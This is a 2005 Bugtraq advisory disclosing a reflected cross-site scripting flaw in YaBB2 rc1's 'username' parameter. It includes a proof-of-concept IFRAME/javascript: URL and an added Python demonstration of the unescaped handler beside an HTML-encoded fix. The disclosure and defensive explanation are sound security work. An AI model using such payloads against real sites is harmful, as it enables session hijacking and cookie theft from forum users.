Date: 13 Mar 2005 13:50:03 -0000
From: alireza hassani <trueend5@...oo.com>
To: bugtraq@...urityfocus.com
Subject: YaBB2 rc1 XSS

[PersianHacker.NET 200503-08] YaBB2 rc1 XSS Vulnerability
Date: March 2005
Bug Number: 08
BID (SecurityFocus Bugtraq ID): 12756

 
YaBB is a free, Perl-based forum software package (the forum script is YaBB.pl). The vendor describes it as rivalling any professional message board and as providing a real-time chat and support system for visitors.

More info @:
http://www.yabbforum.com/
 
 
Discussion:
--------------------
The 'usersrecentposts' action of YaBB.pl is vulnerable to reflected cross-site scripting: the value of the 'username' parameter is written back into the page without being HTML-encoded, so a remote user can inject HTML and script into the response.

A remote attacker can construct a malicious URI that includes hostile HTML and script code. If a victim follows the link, the hostile code is rendered in the victim's browser in the security context of the affected web site, which may allow theft of cookie-based authentication credentials or other attacks against the victim's session with the forum.

This vulnerability is reported to exist in YaBB2 rc1; other versions may also be affected.
 
Exploit:
--------------------
http://www.example.com/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>
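The proof-of-concept above is a URL-encoded IFRAME whose SRC is a javascript: URL, placed in the 'username' parameter. The following is an added example, not code from the advisory or from YaBB: a minimal Python model of a handler that reflects 'username' the way the PoC requires, beside the same handler with HTML entity encoding applied at the output point. The handler names, the page template and the optional second URL-decoding step (which is what would turn the PoC's %252F into '/') are assumptions for illustration; the rendered output is fed through Python's html.parser to show which start tags a tolerant tokenizer, and hence a browser, would see.

```python
"""Added example, not YaBB code: why the PoC URL above executes and how output
encoding stops it. The handler names, the HTML template and the optional second
URL-decoding step are assumptions for illustration, not YaBB internals."""
import html
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Proof-of-concept URL from the advisory, copied verbatim.
POC_URL = ("http://www.example.com/YaBB.pl?action=usersrecentposts;"
           "username=<IFRAME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>")

# Hypothetical page template standing in for YaBB's real output.
TEMPLATE_HEAD = "<h1>Recent posts by "
TEMPLATE_TAIL = "</h1>"


def parse_yabb_query(url: str, decode_twice: bool = False) -> dict:
    """Split a YaBB-style ';'-separated query string into parameters.

    decode_twice models an application that URL-decodes a value a second time,
    which is what turns the PoC's %252F into '/'. Whether YaBB did this is not
    stated in the advisory; it is an assumption used to show the effect.
    """
    params = {}
    for pair in urlsplit(url).query.split(";"):
        key, _, value = pair.partition("=")
        value = unquote(value)          # first decode: %252F -> %2F, %3D -> =
        if decode_twice:
            value = unquote(value)      # second decode: %2F -> /
        params[key] = value
    return params


def render_vulnerable(username: str) -> str:
    """Reflects the parameter unescaped: '<' and '>' from the query string reach
    the browser as markup, so the IFRAME and its javascript: URL run in the
    forum's origin."""
    return TEMPLATE_HEAD + username + TEMPLATE_TAIL


def render_fixed(username: str) -> str:
    """Same template with HTML entity encoding at the output point: '<', '>',
    '&' and both quote characters become entities, so the browser renders the
    value as text rather than parsing it as a tag."""
    return TEMPLATE_HEAD + html.escape(username, quote=True) + TEMPLATE_TAIL


class _StartTagCollector(HTMLParser):
    """Records every start tag a tolerant HTML parser sees, as a stand-in for
    what a browser's tokenizer would treat as markup."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(page: str) -> list:
    """All start tags (name, attribute dict) found in a rendered page."""
    parser = _StartTagCollector()
    parser.feed(page)
    parser.close()
    return parser.tags


def injected_tags(page: str) -> list:
    """Start tags in the rendered page other than the template's own <h1>,
    i.e. markup that originated in user-supplied data."""
    return [(tag, attrs) for tag, attrs in start_tags(page) if tag != "h1"]


if __name__ == "__main__":
    name = parse_yabb_query(POC_URL)["username"]
    print("decoded once :", name)
    print("decoded twice:", parse_yabb_query(POC_URL, decode_twice=True)["username"])
    print("vulnerable   :", injected_tags(render_vulnerable(name)))
    print("fixed        :", injected_tags(render_fixed(name)))
```

Running it and comparing the two `injected_tags` lines shows the point: the unescaped page yields an `iframe` start tag whose `src` is the javascript: URL, the encoded page yields none. A browser does not need the closing tag to run the payload, since an unterminated IFRAME with a javascript: source is still created, so the %252F double encoding of `</IFRAME>` in the PoC only changes what the application sees after decoding, not whether the injection works.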
 
 
Solution:
--------------------
No vendor fix is available at this time. The standard mitigation for this class of bug is to HTML-encode user-supplied values, here the 'username' parameter, at the point where they are written into the page.
 
 
Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Alireza Hassani (trueend5 yahoo com)
http://www.PersianHacker.NET
 
 
Help
--------------------
Read our whitepaper on XSS vulnerabilities (in Farsi only):
http://www.persianhacker.net/articles/article-2322.html
Visit: http://www.PersianHacker.NET
or mail me @: trueend5 yahoo com
 
And to Iranians all around the world: Happy 4shanbesoori and Happy New Year

